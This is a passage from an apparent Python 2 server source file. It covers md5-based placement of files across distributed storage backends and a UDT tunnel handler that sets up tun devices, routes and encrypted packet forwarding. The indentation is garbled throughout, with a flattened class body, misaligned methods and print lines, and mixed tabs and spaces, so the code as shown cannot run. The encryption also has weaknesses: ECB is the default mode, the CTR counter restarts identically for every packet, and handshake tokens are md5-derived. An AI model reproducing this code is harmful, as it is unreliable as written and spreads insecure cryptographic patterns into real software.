		backend pools and the writer IP list.  Safe to call for reload."""
		try:
			#for reload config
			self.dfs_pool = {}
			self.dfs_pool_count = {}
			self.dfs_writer = []
			self.ttl = {}
			self.rra = {}
			self.rrn = {}
			self.dfs_config = ConfigParser.ConfigParser()
			if not self.dfs_config.read('3xsd.conf'):
				self.dfs_config.read('/etc/3xsd.conf')
			for name, value in self.dfs_config.items('3fsd'):
				if name == 'stage':
					self.dfs_stage = int(value)
				elif name == 'redundancy':
					self.dfs_redundancy = int(value)
				elif name == 'region':
					self.dfs_region = int(value)
					#mask = number of hex digits needed to index the region
					self.dfs_region_mask = 1
					while self.dfs_region/(16**self.dfs_region_mask) > 1:
						self.dfs_region_mask += 1
				elif name == 'prefix':
					self.dfs_prefix = value
					self.dfs_prefix_s = ''.join(['/', self.dfs_prefix, '_'])
				elif name == 'write_permit':
					self.ttl['3fs_writer'] = 0
					self.dfs_writer = self.ip_list('3fs_writer', value, '3nsd')
				else:
					#must be a pool config of a domain_name
					#3xsd.net = 0,10.37.10.1-2:80,10.38.10.2:80;1,10.41.0.1-2:8000
					self.ttl[name] = self.rrn[name] = 0
					self.rra[name] = []
					self.dfs_pool[name] = {}
					self.dfs_pool_count[name] = {}
					for item in value.split(';'):
						if item:
							_stage_s, _ip_s = item.split(',', 1)
							if _stage_s and _ip_s:
								#dfs_pool['3xsd.net'][0] = ['10.37.10.1:80', '10.37.10.2:80', '10.38.10.2:80']
								#dfs_pool['3xsd.net'][1] = ['10.41.0.1:8000', '10.41.0.2:8000']
								if self.dfs_pool[name].get(int(_stage_s)):
									self.dfs_pool[name][int(_stage_s)] += self.ip_list(name, _ip_s, '3fsd')
								else:
									self.dfs_pool[name][int(_stage_s)] = self.ip_list(name, _ip_s, '3fsd')
					for i in self.dfs_pool[name]:
						#to gen a fixed sorted server list, important for locating algorithm
						self.dfs_pool[name][i].sort()
						self.dfs_pool_count[name][i] = len(self.dfs_pool[name][i])
						#rra pool for RoundRobin
						self.rra[name] += self.dfs_pool[name][i]
					if self.rra.get(name):
						#make list distinct and sorted
						self.rra[name] = list(set(self.rra[name]))
						self.rra[name].sort()
						#print self.rra[name]
		except:
			raise
		#print "stage:", self.dfs_stage, ", redundancy:", self.dfs_redundancy, ", region:", self.dfs_region, ", prefix:", self.dfs_prefix, ", pool:", self.dfs_pool
	def init_handler(self, conn, client_address, rw_mode=0):
		"""Per-request (re)initialization: base init plus DFS file state."""
		_xZHandler.init_handler(self, conn, client_address, rw_mode)
		#do 3fsd specific initiation
		self.file_stage = 0
		self.file_path = self.file_md5 = b''
	def z_pick_a_backend(self, return_all=False):
		"""Pick a backend; DFS-prefixed paths use the locating algorithm,
		everything else falls back to the base zsd selection."""
		#self.z_hostname self.path self._r should be setup
		if self.dfs_prefix_s == self.path[:len(self.dfs_prefix_s)]:
			#it's a dfs access
			return self.dfs_locate_backend(self.z_hostname, return_all)
		else:
			return _xZHandler.z_pick_a_backend(self)
	def dfs_locate_backend(self, hostname, return_all=False):
		"""Map the request path onto its replica servers.

		Consecutive dfs_region_mask-digit slices of the path's md5 give
		one hash point per replica; each point is scaled onto the sorted
		stage pool, stepping forward on collision so replicas land on
		distinct servers.  Returns the full replica list when return_all
		is True, otherwise one replica picked at random.
		"""
		#3fs locating algorithm
		#url example: http://hostname/_3fs_0/path/to/file, 0 for stage
		#/path/to/file will be used to calculate out a standard md5 hex_string of 32 letters with lower case
		#/path/to/file -> b4a91649090a2784056565363583d067
		_fstage_s, _fpath = self.path[len(self.dfs_prefix_s):].split('/', 1)
		self.file_stage = int(_fstage_s)
		self.file_path = ''.join(['/', _fpath])
		md5 = hashlib.md5()
		md5.update(self.file_path)
		self.file_md5 = md5.hexdigest()
		i = 0
		_ret = []
		while self.dfs_redundancy - i > 0:
			_point = int(self.file_md5[self.dfs_region_mask*i:self.dfs_region_mask*(i+1)], base=16)
			_serno = __serno = int(_point / float(self.dfs_region / self.dfs_pool_count[hostname][self.dfs_stage]))
			while self.dfs_pool[hostname][self.dfs_stage][_serno] in _ret:
				#make sure the redundancy copys not in same server
				_serno = ( _serno + 1 ) % self.dfs_pool_count[hostname][self.dfs_stage]
				if _serno == __serno:
					#wrapped all the way around: fewer servers than replicas
					break
			_ret.append(self.dfs_pool[hostname][self.dfs_stage][_serno])
			i += 1
		if return_all:
			return _ret
		else:
			return _ret[random.randint(0, self.dfs_redundancy - 1)]
	def z_GET_init(self):
		"""Handle GET: like the base version, but never reuses an existing
		backend pairing for DFS paths (the replica choice is per-file)."""
		#init connection to backend, send request, ggg
		_f = None
		try:
			self.z_hostname, _port = self.z_parse_address(self.in_headers.get("Host").lower())
			if self.z_hostname not in self.rra.keys():
				#not my serving hostname
				self.xResult = self.xR_ERR_HANDLE
				return
			_cb = self.server.cb_conns.get(self._f)
			if _cb:
				self.z_host_sock, _f = _cb
			else:
				self.z_host_sock, _f = self.None2
			if _f and self.server.zhosts.get(_f, None) == self.z_hostname and self.dfs_prefix_s != self.path[:len(self.dfs_prefix_s)]:
				#print "z_GET_init remake cb_conns pair:", self._f, _f
				self._f = _f
				self.server.cb_conns[_f] = [self.sock, self.sock.fileno()]
			else:
				#print "z_GET_init new conn:", self._f, _f
				self.z_connect_backend()
				_f = self._f
			if self.xResult == self.xR_ERR_5xx:
				return
			self.z_send_request_init()
		except:
			self.xResult = self.xR_ERR_HANDLE
	def z_PUT_init(self):
		"""Handle PUT/DELETE: only allowed on DFS paths from writer IPs.

		The request is written to every replica: the first backend is the
		one whose response is relayed, the rest are fire-and-forget
		(no_recv=True).  Errors set self.xResult = xR_ERR_HANDLE.
		"""
		try:
			self.z_hostname, _port = self.z_parse_address(self.in_headers.get("Host").lower())
			if self.z_hostname not in self.rra.keys():
				#not my serving hostname
				self.xResult = self.xR_ERR_HANDLE
				return
			if self.dfs_prefix_s == self.path[:len(self.dfs_prefix_s)]:
				#only 3fs access allow PUT/DELETE action in z_lbs & x_dfs mode
				try:
					self.peer_ip_s, _port_s = self.sock.getpeername()
				except:
					self.peer_ip_s = b''
				if self.peer_ip_s not in self.dfs_writer:
					self.xResult = self.xR_ERR_HANDLE
					return
				_backends = self.z_pick_a_backend(return_all=True)
				_b_index = 0
				for _b in _backends:
					self.z_host_addr = self.z_parse_address(_b)
					self.z_host_sock = None
					if _b_index == 0:
						self.z_connect_backend(addr=self.z_host_addr)
						self.z_send_request_init()
					else:
						#redundant replicas: write without expecting a response
						self.z_connect_backend(addr=self.z_host_addr, update_cb_conns=False)
						self.z_send_request_init(no_recv=True)
					_b_index += 1
			else:
				self.xResult = self.xR_ERR_HANDLE
		except:
			self.xResult = self.xR_ERR_HANDLE
			raise
class _xWHandler:
server = None
wdd_mode = 'server'
wdd_dial = []
encrypt = False
encrypt_mode = None
sess_encrypt_mode = {}
aes = {}
compress_tunnel = {}
session = {}
client_session = {}
connected = {}
tun_local_ip = {}
tun_peer_ip = {}
tun_mtu = {}
tun_txqueue = {}
token = {}
e_token = {}
peer_ip = {}
peer_port = {}
tun_route = {}
tun_rtt = {}
route_metric = {}
route_metric_fixed = {}
routing_metric = False
ifup_script = {}
ifdown_script = {}
rtch_script = {}
udt_relay = {}
udt_relay_thread_stat = {}
IO_BLOCK = 0
IO_NONBLOCK = 1
io_mode = 0
	def __init__(self, conn, client_address, server, recv_buf_size=2760000, send_buf_size=2760000):
		"""Bind the handler to its server, record buffer sizes, then load
		the [3wdd] configuration and run the per-handler init hook.
		conn/client_address are accepted for interface parity but are not
		stored here."""
		self.server = server
		self.recv_buf_size = recv_buf_size
		self.send_buf_size = send_buf_size
		self.init_wdd_config()
		self.init_handler()
	def init_wdd_config(self):
		"""Parse the [3wdd] section of 3xsd.conf (or /etc/3xsd.conf).

		Resets all tunnel state (safe for reload), then fills in the
		mode, dial list, encryption/compression settings, relay pairs and
		per-session tunnel definitions (local/peer ip, mtu, txqueue,
		token, optional per-session cipher, peer address and routes).
		"""
		#for reload config
		self.wdd_mode = 'server'
		self.wdd_dial = []
		self.encrypt = False
		self.encrypt_mode = None
		self.sess_encrypt_mode = {}
		self.aes = {}
		self.session = {}
		self.client_session = {}
		self.connected = {}
		self.tun_local_ip = {}
		self.tun_peer_ip = {}
		self.tun_mtu = {}
		self.tun_txqueue = {}
		self.token = {}
		self.e_token = {}
		self.peer_ip = {}
		self.peer_port = {}
		self.tun_route = {}
		self.tun_rtt = {}
		self.route_metric = {}
		self.route_metric_fixed = {}
		self.udt_relay = {}
		self.udt_relay_thread_stat = {}
		self.compress_tunnel = {}
		self.io_mode = 0
		self.routing_metric = False
		self.ifup_script = {}
		self.ifdown_script = {}
		self.rtch_script = {}
		self.config = ConfigParser.ConfigParser()
		if not self.config.read('3xsd.conf'):
			self.config.read('/etc/3xsd.conf')
		#
		#example: an udt tunnel session called: peer1
		#local ip: 10.19.27.1  peer ip: 10.19.27.2
		#mtu: 1500  txqueue: 1000  connect token(password): ddw3~)
		#
		#peer1 = 10.19.27.1:10.19.27.2:1500:1000:ddw3~)
		for name, value in self.config.items('3wdd'):
			if name == 'mode':
				self.wdd_mode = value.lower()
			elif name == 'dial':
				self.wdd_dial = value.split(',')
			elif name == 'encrypt':
				#global cipher default; per-session field 6 may override it
				self.encrypt = True
				_value = value.lower()
				if _value == 'on' or _value == 'aes-128-ecb':
					self.encrypt_mode = AES.MODE_ECB
				elif _value == 'aes-128-cbc':
					self.encrypt_mode = AES.MODE_CBC
				elif _value == 'aes-128-cfb':
					self.encrypt_mode = AES.MODE_CFB
				elif _value == 'aes-128-ctr':
					self.encrypt_mode = AES.MODE_CTR
				elif _value == 'blowfish-cbc':
					self.encrypt_mode = Blowfish.MODE_CBC + 100 #diff from aes
				elif _value == 'blowfish-cfb':
					self.encrypt_mode = Blowfish.MODE_CFB + 100
				elif _value == 'blowfish-ctr':
					self.encrypt_mode = Blowfish.MODE_CTR + 100
				else:
					self.encrypt = False
			elif name == 'io_mode':
				_value = value.lower()
				if _value == 'block' or _value == 'default':
					self.io_mode = self.IO_BLOCK
				elif _value == 'non_block':
					self.io_mode = self.IO_NONBLOCK
				else:
					self.io_mode = self.IO_BLOCK
			elif name == 'relay':
				#forward packets between two named sessions instead of a tun
				for _from_to in value.split(','):
					_from, _to = _from_to.split(':')
					if _from and _to:
						self.udt_relay[_from] = (_from, _to)
						self.udt_relay[_to] = (_from, _to)
						self.udt_relay_thread_stat[_from] = False
						self.udt_relay_thread_stat[_to] = False
			elif name == 'routing_metric':
				_value = value.lower()
				if _value == 'on':
					self.routing_metric = True
			else:
				#a session definition: local:peer:mtu:txqueue:token[:cipher[,zip]][:peer_ip:peer_port][:routes]
				v = value.split(':')
				if len(v) >= 5:
					self.session[name] = True
					self.tun_local_ip[name] = v[0]
					self.tun_peer_ip[name] = v[1]
					self.tun_mtu[name] = int(v[2]) if v[2] else 0
					self.tun_txqueue[name] = int(v[3]) if v[3] else 0
					self.token[name] = v[4]
					self.e_token[name] = self.encrypt_token(name, v[4])
					if self.encrypt:
						if self.encrypt_mode == AES.MODE_CBC or self.encrypt_mode == AES.MODE_CFB:
							#aes-128-cbc, aes-128-cfb
							pass
						else:
							#aes-128-ecb as default
							if name not in self.aes:
								self.aes[name] = AES.new(self.e_token[name], AES.MODE_ECB)
					if len(v) > 5:
						if v[5]:
							#per-session cipher (and optional compression) override
							_em_zip = v[5].lower().split(',')
							_em = _em_zip[0]
							if _em == 'aes-128-cbc':
								self.sess_encrypt_mode[name] = AES.MODE_CBC
							elif _em == 'aes-128-cfb':
								self.sess_encrypt_mode[name] = AES.MODE_CFB
							elif _em == 'aes-128-ctr':
								self.sess_encrypt_mode[name] = AES.MODE_CTR
							elif _em == 'on' or _em == 'aes-128-ecb':
								self.sess_encrypt_mode[name] = AES.MODE_ECB
								if name not in self.aes:
									self.aes[name] = AES.new(self.e_token[name], AES.MODE_ECB)
							elif _em == 'blowfish-cbc':
								self.sess_encrypt_mode[name] = Blowfish.MODE_CBC + 100
							elif _em == 'blowfish-cfb':
								self.sess_encrypt_mode[name] = Blowfish.MODE_CFB + 100
							elif _em == 'blowfish-ctr':
								self.sess_encrypt_mode[name] = Blowfish.MODE_CTR + 100
							if len(_em_zip) > 1:
								if _em_zip[1] == 'zlib' or _em_zip[1] == 'compress':
									self.compress_tunnel[name] = 'zlib'
								elif _em_zip[1] == 'lzo':
									self.compress_tunnel[name] = 'lzo'
					if len(v) > 7:
						#fields 7/8: peer address to dial (client session)
						if v[6]:
							self.peer_ip[name] = v[6]
							self.client_session[name] = True
						if v[7]:
							self.peer_port[name] = int(v[7])
						else:
							self.peer_port[name] = 9000
					if len(v) > 8 or len(v) == 7:
						#last field: comma-separated routes and ifup/ifdown/rtch hooks
						self.tun_route[name] = []
						for route in v[len(v) - 1].split(','):
							if route:
								if "ifup=" in route:
									#not a 0.0.0.0/0 route, must be a ifup/ifdown script
									self.ifup_script[name] = route[5:]
									continue
								if "ifdown=" in route:
									self.ifdown_script[name] = route[7:]
									continue
								if "rtch=" in route:
									self.rtch_script[name] = route[5:]
									continue
								if route.count('/') == 2:
									#net/mask/metric form: remember the fixed metric
									_net, _mask, _s_metric = route.split('/')
									route = ''.join([_net, '/', _mask])
									_metric = int(_s_metric)
									if route in self.route_metric_fixed:
										self.route_metric_fixed[route][name] = _metric
									else:
										self.route_metric_fixed[route] = {name: _metric}
								self.tun_route[name].append(route)
								if route in self.route_metric:
									#later sessions get increasing default metrics
									self.route_metric[route][name] = len(self.route_metric[route]) + 1
								else:
									self.route_metric[route] = {name: 1}
def encrypt_token(self, session, token):
md5 = hashlib.md5()
md5.update(''.join([session, '#', token]))
return md5.hexdigest()
	def init_handler(self):
		"""Per-handler initiation hook; intentionally a no-op for 3wdd."""
		pass
	def connect_udt_server(self, target, new_port=None): #ctud
		"""Dial the UDT server for session `target` and perform the
		connect handshake.

		Wire protocol (each message is length-prefixed with '!i'):
		  send  "target:peer_ip:port:allow_redirect"
		  recv  our own IP as seen by the server
		  send  verification token = md5(e_token # server_ip # client_ip)
		  recv  result: 0 = accepted (set up the tunnel), 1 = redirect to
		        a new port (retry in a fresh thread)
		A negative configured port means "do not allow redirect".
		Any failure closes the socket and returns silently.
		"""
		sock = udt.UdtSocket()
		sock.setsockopt(udt4.UDT_RCVBUF, self.server.recv_buf_size) #default 10MB
		sock.setsockopt(udt4.UDT_SNDBUF, self.server.send_buf_size) #default 10MB
		if new_port:
			_port = new_port
			_allow_redirect = 0
		else:
			_port = self.peer_port[target]
			if _port < 0:
				_port = abs(_port)
				_allow_redirect = 0
			else:
				_allow_redirect = 1
		_peer_ip = socket.gethostbyname(self.peer_ip[target])
		try:
			#print "connecting udt server", self.peer_ip[target], str(_port)
			sock.connect((_peer_ip, _port))
		except:
			sock.close()
			return
		_c_str = ''.join([target, ':', _peer_ip, ':', str(_port), ':', str(_allow_redirect)])
		sock.send(struct.pack('!i', len(_c_str)))
		sock.send(_c_str)
		try:
			_len = struct.unpack('!i', sock.recv(4))[0]
			_my_ip = sock.recv(_len)
		except:
			sock.close()
			return
		#the _s_token used to verify the two sides has 4 factors: session_name, passwd(token), server_ip, client_ip
		#this should be able to prevent from middleman attack & fake connect attempt
		_s_token = self.encrypt_token(self.e_token[target], ''.join([_peer_ip, '#', _my_ip]))
		sock.send(struct.pack('!i', len(_s_token)))
		sock.send(_s_token)
		try:
			_result = -1
			_result = struct.unpack('!i', sock.recv(4))[0]
		except:
			sock.close()
			return
		if _result == 0:
			#accepted: bring the tunnel up and count the connection
			self.setup_tunnel(target, sock, (_peer_ip, _port))
			self.connected[target] = True
			self.server.udt_conns_cnt[self.server._worker_id].value += 1
		elif _result == 1:
			#server redirects us to another port: reconnect in background
			_len = struct.unpack('!i', sock.recv(4))[0]
			_new_port_str = sock.recv(_len)
			sock.close()
			t = threading.Thread(target=self.connect_udt_server, args=(target,int(_new_port_str)))
			t.daemon = True
			t.start()
def setup_tunnel(self, session_name, conn, addr): #stst
    """Bring up one tunnel session around an established UDT connection.

    session_name -- configured session key
    conn         -- connected udt.UdtSocket
    addr         -- (peer_ip, peer_port) of the UDT peer

    For a normal session a tun device named "<session>.<worker_id>" is
    created, configured and routed; for a session listed in self.udt_relay
    no tun device exists and traffic is only relayed between UDT sockets.
    Depending on io_mode, sockets are either registered with a sharded
    epoll (IO_NONBLOCK) or served by dedicated forwarding threads.
    On any failure the partial state is rolled back and the error re-raised.
    """
    try:
        if not conn or not addr or not session_name: return
        # relay sessions forward between two UDT sockets; no tun device
        _do_relay = True if session_name in self.udt_relay else False
        _tun = None
        if not _do_relay:
            # create and configure the point-to-point tun device
            _tun_name = ''.join([session_name, '.', str(self.server._worker_id)])
            _tun = pytun.TunTapDevice(name=_tun_name, flags=pytun.IFF_TUN|pytun.IFF_NO_PI)
            _tun.addr = self.tun_local_ip[session_name]
            _tun.dstaddr = self.tun_peer_ip[session_name]
            _tun.netmask = '255.255.255.255'
            _tun.mtu = self.tun_mtu[session_name]
            with open(os.devnull, 'w') as devnull:
                # drop any stale host route to the peer address first
                subprocess.call(['ip', 'route', 'del', ''.join([_tun.dstaddr, '/', _tun.netmask])], stderr=devnull)
            self.server.ztuns[_tun.fileno()] = _tun
            self.server.s_tuns[_tun.fileno()] = session_name
            _tun.up()
            with open(os.devnull, 'w') as devnull:
                subprocess.call(['ip', 'link', 'set', _tun_name, 'txqueuelen', str(self.tun_txqueue[session_name])], stderr=devnull)
            if session_name in self.tun_route:
                if self.tun_route[session_name]:
                    with open(os.devnull, 'w') as devnull:
                        for route in self.tun_route[session_name]: #rtrt
                            if route in self.route_metric:
                                if self.route_metric[route][session_name] == -1:
                                    # route was released by destroy_tunnel; re-add it
                                    if len(self.route_metric[route]) > 1:
                                        # several sessions share this route: park this one
                                        # at a high metric (327670 + list position), i.e.
                                        # lower routing priority than the active session
                                        j = 0
                                        for k in self.route_metric[route]:
                                            if k == session_name:
                                                break
                                            else:
                                                j += 1
                                        self.route_metric[route][session_name] = 327670 + j
                                        subprocess.call(['ip', 'route', 'add', route, 'metric', str(self.route_metric[route][session_name]), 'dev', _tun_name], stderr=devnull)
                                    else:
                                        # only session for this route: take metric 1
                                        self.route_metric[route][session_name] = 1
                                        subprocess.call(['ip', 'route', 'add', route, 'metric', '1', 'dev', _tun_name], stderr=devnull)
                                else:
                                    # metric already assigned earlier: reuse it
                                    subprocess.call(['ip', 'route', 'add', route, 'metric', str(self.route_metric[route][session_name]), 'dev', _tun_name], stderr=devnull)
                            else:
                                # no metric bookkeeping for this route: replace it outright
                                subprocess.call(['ip', 'route', 'del', route], stderr=devnull)
                                subprocess.call(['ip', 'route', 'add', route, 'dev', _tun_name], stderr=devnull)
            _ifup_script = self.ifup_script.get(session_name, None)
            if _ifup_script:
                # optional user hook, run once the interface is up
                with open(os.devnull, 'w') as devnull:
                    subprocess.call([_ifup_script, _tun_name], stderr=devnull)
        # register the session: udt socket id -> session, session -> (tun, udt, addr)
        self.server.s_udts[conn.UDTSOCKET.UDTSOCKET] = session_name
        self.server.zsess[session_name] = (_tun, conn , addr)
        self.tun_rtt[session_name] = -1
        # per-session encryption mode overrides the global default
        if self.encrypt or session_name in self.sess_encrypt_mode:
            if session_name in self.sess_encrypt_mode:
                _encrypt_mode = self.sess_encrypt_mode[session_name]
            else:
                _encrypt_mode = self.encrypt_mode
        else:
            _encrypt_mode = None
        if session_name in self.compress_tunnel:
            _compress = self.compress_tunnel[session_name]
        else:
            _compress = None
        if self.io_mode == self.IO_NONBLOCK:
            #io_mode == IO_NONBLOCK, single thread epoll to handle udt&tun events
            if _tun:
                flag = fcntl.fcntl(_tun.fileno(), fcntl.F_GETFL)
                fcntl.fcntl(_tun.fileno(), fcntl.F_SETFL, flag | os.O_NONBLOCK)
            conn.setblocking(False)
            # connections are sharded over udt_thread_limit epoll instances
            _n = conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
            if self.server.upolls[_n] is None:
                # first socket in this shard: create its epoll and worker thread
                self.server.upolls[_n] = udt.Epoll()
                self.server.upolls[_n].add_usock(conn, udt4.UDT_EPOLL_IN)
                self.udt_relay_thread_stat[session_name] = True
                if not _do_relay:
                    self.server.upolls[_n].add_ssock(_tun, udt4.UDT_EPOLL_IN)
                t = threading.Thread(target=self.server.handle_event_udt_tun, args=(_n,))
                t.daemon = True
                t.start()
            else:
                self.server.upolls[_n].add_usock(conn, udt4.UDT_EPOLL_IN)
                self.udt_relay_thread_stat[session_name] = True
                if not _do_relay:
                    self.server.upolls[_n].add_ssock(_tun, udt4.UDT_EPOLL_IN)
        else:
            #io_mode == IO_BLOCK (default), 2 threads bi-direction forwarding packages
            if not _do_relay:
                t = threading.Thread(target=self.server.forward_tun_udt,args=(_tun,conn,_encrypt_mode,_compress,session_name,))
                t.daemon = True
                t.start()
                t = threading.Thread(target=self.server.forward_udt_tun,args=(_tun,conn,_encrypt_mode,_compress,session_name,))
                t.daemon = True
                t.start()
            else:
                t = threading.Thread(target=self.server.forward_udt_relay,args=(conn,session_name,))
                t.daemon = True
                t.start()
    if _do_relay:
            print "UDT relay tunnel", session_name, "launched, no tun device, io_mode:", self.io_mode
        else:
            print "UDT tunnel", session_name, "launched, local", _tun.addr, "peer", _tun.dstaddr, "mtu", _tun.mtu, "encryption:", _encrypt_mode, "compress:", _compress, "io_mode:", self.io_mode
    except:
        # roll back whatever got set up, then re-raise for the caller
        if conn:
            try:
                if self.io_mode == self.IO_NONBLOCK and self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit]:
                    self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit].remove_usock(conn)
            except:
                pass
            try:
                conn.close()
                del conn
            except:
                pass
        if _tun:
            try:
                if self.io_mode == self.IO_NONBLOCK and self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit]:
                    self.server.upolls[conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit].remove_ssock(_tun)
            except:
                pass
            try:
                _tun.down()
                _tun.close()
                del _tun
            except:
                pass
        raise
def destroy_tunnel(self, session_name): #ddd
    """Tear down one tunnel session and release every resource tied to it.

    Pops the (tun, udt socket, addr) triple registered by setup_tunnel,
    marks the session's routes as released (metric -1, so setup_tunnel can
    re-install them on reconnect), unregisters both ends from the epoll
    shard, closes the tun device and the UDT socket, flags any relay
    thread to stop, and finally runs the optional ifdown script.  Safe to
    call for sessions that were only partially set up.
    """
    _tun, _conn, _addr = self.server.zsess.pop(session_name, (None, None, None))
    self.connected.pop(session_name, None)
    self.tun_rtt.pop(session_name, None)
    if session_name in self.tun_route:
        # -1 marks the route as inactive for this session (see setup_tunnel)
        for _route in self.tun_route[session_name]:
            self.route_metric[_route][session_name] = -1
    if _tun:
        print "Destroying", ''.join([session_name, '.', str(self.server._worker_id)]), _tun, _conn, _addr
    else:
        print "Destroying", ''.join([session_name, '.', str(self.server._worker_id)]), _conn, _addr
    if _conn and _addr:
        if _tun:
            self.server.ztuns.pop(_tun.fileno(), None)
            self.server.s_tuns.pop(_tun.fileno(), None)
        self.server.s_udts.pop(_conn.UDTSOCKET.UDTSOCKET, None)
        self.server.udt_conns_cnt[self.server._worker_id].value -= 1
        if session_name in self.server.udt_send_buf:
            self.server.udt_send_buf.pop(session_name)
        if self.io_mode == self.IO_NONBLOCK:
            # unregister both ends from the epoll shard before closing
            try:
                _n = _conn.UDTSOCKET.UDTSOCKET % self.server.udt_thread_limit
                if self.server.upolls[_n]:
                    self.server.upolls[_n].remove_usock(_conn)
                    if _tun:
                        self.server.upolls[_n].remove_ssock(_tun)
            except:
                pass
        try:
            #revoke mem, does it work?
            if _tun:
                _tun.down()
                _tun.close()
                del _tun
            _conn.close()
            del _conn
            del _addr
        except:
            pass
    if session_name in self.udt_relay_thread_stat:
        # signals the relay forwarding thread to exit its loop
        self.udt_relay_thread_stat[session_name] = False
    _ifdown_script = self.ifdown_script.get(session_name, None)
    if _ifdown_script:
        # optional user hook, run after teardown
        with open(os.devnull, 'w') as devnull:
            subprocess.call([_ifdown_script, ''.join([session_name, '.', str(self.server._worker_id)])], stderr=devnull)
def setup_udt_connection(self, conn, addr): #stud
    """Server side of the UDT handshake for one accepted connection.

    conn -- accepted udt.UdtSocket; addr -- (client_ip, client_port).

    Reads the length-prefixed "session:my_ip:my_port:allow_redirect"
    string, replies with the client's IP as seen from here, verifies the
    md5 token built from the session key and both IPs, then either
    redirects the client to the current idle worker port (result 1) or
    accepts (result 0) and sets up the tunnel.  Unknown sessions and bad
    tokens are simply closed.  On unexpected errors the connection is
    closed and the exception re-raised.
    """
    try:
        if not conn or not addr:
            return
        _len = 0
        _len = struct.unpack('!i', conn.recv(4))[0]
        if _len > 0:
            _c_str = conn.recv(_len)
            _session_name, _my_ip, _my_port_str, _allow_redirect_str = _c_str.split(':',3)
            _peer_ip, _peer_port = addr
            if _session_name not in self.session:
                #no such session config
                conn.close()
            else:
                # echo back the IP the client appears as, so it can build its token
                conn.send(struct.pack('!i', len(_peer_ip)))
                conn.send(_peer_ip)
                _len = struct.unpack('!i', conn.recv(4))[0]
                if _len > 0:
                    _s_token = conn.recv(_len)
                    if _s_token == self.encrypt_token(self.e_token[_session_name], ''.join([_my_ip, '#', _peer_ip])):
                        #pass, check idle worker
                        if _allow_redirect_str == '1':
                            #this value changed at every connection time
                            #_idle_port = self.server.wdd_idle_worker(int(_my_port_str))
                            #this value fixed for about 20 secs
                            _idle_port = self.server.udt_conn_port.value
                        else:
                            _idle_port = int(_my_port_str)
                        if _idle_port == int(_my_port_str):
                            #tell client, setup the tunnel, put conn in epoll
                            conn.send(struct.pack('!i', 0))
                            if _session_name in self.connected:
                                #only one tunnel per session
                                self.destroy_tunnel(_session_name)
                            self.setup_tunnel(_session_name, conn, addr)
                            self.connected[_session_name] = True
                            self.server.udt_conns_cnt[self.server._worker_id].value += 1
                        else:
                            #send redirect msg
                            conn.send(struct.pack('!i', 1))
                            conn.send(struct.pack('!i', len(str(_idle_port))))
                            conn.send(str(_idle_port))
                            conn.close()
                    else:
                        #sorry -- token mismatch
                        conn.close()
    except:
        if conn:
            try:
                conn.close()
                del conn
                del addr
            except:
                pass
        raise
def decrypt_package(self, _buf, _encrypt_mode, _session):
    """Decrypt one tunnel payload for `_session`.

    Mode constants offset by +100 select Blowfish; plain PyCrypto mode
    constants select AES.  CBC/CFB packets carry their IV as the leading
    cipher block; CBC additionally strips the chr(n)*n tail padding added
    by encrypt_package.  CTR modes use a fresh Counter per call, and the
    fallback is the per-session AES-ECB cipher kept in self.aes.
    """
    _strip_pad = lambda s : s[0:-ord(s[-1])]
    _key = self.e_token[_session]
    if _encrypt_mode in (Blowfish.MODE_CBC + 100, Blowfish.MODE_CFB + 100):
        _bs = Blowfish.block_size
        _blf = Blowfish.new(_key, _encrypt_mode - 100, _buf[:_bs])
        _plain = _blf.decrypt(_buf[_bs:])
        # only CBC carries padding; CFB is a stream mode
        return _strip_pad(_plain) if _encrypt_mode == Blowfish.MODE_CBC + 100 else _plain
    if _encrypt_mode == Blowfish.MODE_CTR + 100:
        return Blowfish.new(_key, _encrypt_mode - 100, counter=Counter.new(64)).decrypt(_buf)
    if _encrypt_mode in (AES.MODE_CBC, AES.MODE_CFB):
        _bs = AES.block_size
        _aes = AES.new(_key, _encrypt_mode, _buf[:_bs])
        _plain = _aes.decrypt(_buf[_bs:])
        return _strip_pad(_plain) if _encrypt_mode == AES.MODE_CBC else _plain
    if _encrypt_mode == AES.MODE_CTR:
        return AES.new(_key, _encrypt_mode, counter=Counter.new(128)).decrypt(_buf)
    # default: AES.MODE_ECB via the cipher prebuilt for this session
    return _strip_pad(self.aes[_session].decrypt(_buf))
def encrypt_package(self, _buf, _encrypt_mode, _session):
    """Encrypt one tunnel payload for `_session` (inverse of decrypt_package).

    CBC modes append chr(n)*n padding to a whole block; CBC/CFB prepend a
    random IV so every packet decrypts independently; CTR modes need
    neither IV nor padding; the fallback is the per-session AES-ECB cipher.
    """
    _key = self.e_token[_session]
    def _padded(s, bs):
        # pad to a whole block with n bytes of chr(n), n in 1..bs
        _n = bs - len(s) % bs
        return ''.join([s, _n * chr(_n)])
    if _encrypt_mode in (Blowfish.MODE_CBC + 100, Blowfish.MODE_CFB + 100):
        _iv = Random.new().read(Blowfish.block_size)
        _blf = Blowfish.new(_key, _encrypt_mode - 100, _iv)
        # CFB/OFB/CTR are stream-like: no padding required
        _body = _padded(_buf, Blowfish.block_size) if _encrypt_mode == Blowfish.MODE_CBC + 100 else _buf
        return ''.join([_iv, _blf.encrypt(_body)])
    if _encrypt_mode == Blowfish.MODE_CTR + 100:
        return Blowfish.new(_key, _encrypt_mode - 100, counter=Counter.new(64)).encrypt(_buf)
    if _encrypt_mode in (AES.MODE_CBC, AES.MODE_CFB):
        _iv = Random.new().read(AES.block_size)
        _aes = AES.new(_key, _encrypt_mode, _iv)
        _body = _padded(_buf, AES.block_size) if _encrypt_mode == AES.MODE_CBC else _buf
        return ''.join([_iv, _aes.encrypt(_body)])
    if _encrypt_mode == AES.MODE_CTR:
        return AES.new(_key, _encrypt_mode, counter=Counter.new(128)).encrypt(_buf)
    # default: AES.MODE_ECB via the cipher prebuilt for this session
    return self.aes[_session].encrypt(_padded(_buf, AES.block_size))
def handle_udt_tun_events(self, sets): #ooo
for u in sets[0]:
_un = u.UDTSOCKET.UDTSOCKET
if _un in self.server.s_udts:
_session = self.server.s_udts[_un]
else:
continue
_encrypt_mode = self.sess_encrypt_mode[_session] if _session in self.sess_encrypt_mode else self.encrypt_mode
_compress = self.compress_tunnel[_session] if _session in self.compress_tunnel else None
_magic = {'zlib':(''.join([chr(0x78), chr(0x9c)]), 2), 'lzo':(''.join([chr(0xf0), chr(0x0), chr(0x0)]), 3)}
